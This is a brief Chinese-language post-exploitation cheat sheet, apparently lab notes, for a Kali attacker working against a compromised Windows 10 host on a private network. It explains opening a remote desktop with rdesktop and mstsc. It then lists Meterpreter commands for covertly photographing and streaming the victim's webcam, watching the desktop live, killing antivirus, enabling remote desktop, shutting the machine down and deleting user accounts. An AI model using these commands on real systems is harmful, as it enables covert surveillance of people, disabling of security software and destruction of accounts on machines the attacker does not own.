攻击机IP地址（kali）：192.168.200.14
靶子机IP地址（windows 10）：192.168.200.81

前提：获取目标主机系统权限之后的操作

远程连接桌面

rdesktop -u username -p password ip

rdesktop报错

解决方法：

我的电脑->属性->远程设置->远程  #这种方法很鸡肋，也就是自己模拟环境，但凡在真实的靶场环境中到这就得死。

yes之后会弹出一个GUI页面
登录后，另一边的windows 10就会提示下线

尝试利用本机连接

终端中输入 mstsc 进入远程连接

扩展：

screenshot   #截取当前屏幕，会提示保存的路径

screenshare #实时监控windows 10桌面,在浏览器中打开

分享几个后渗透命令：

webcam_list        查看摄像头

webcam_snap        通过摄像头拍照

webcam_stream        通过摄像头开启视频

screenshot        获取屏幕截图

screenshare        实时监控桌面

shutdown        关闭目标机器

run getgui-e        启动目标远程桌面

sysinfo        查看目标系统信息

run killav        关闭目标杀毒软件

getuid        查看当前用户权限

getwd        查看目录


run post/windows/manage/delete_user USERNAME=admin 删除指定账号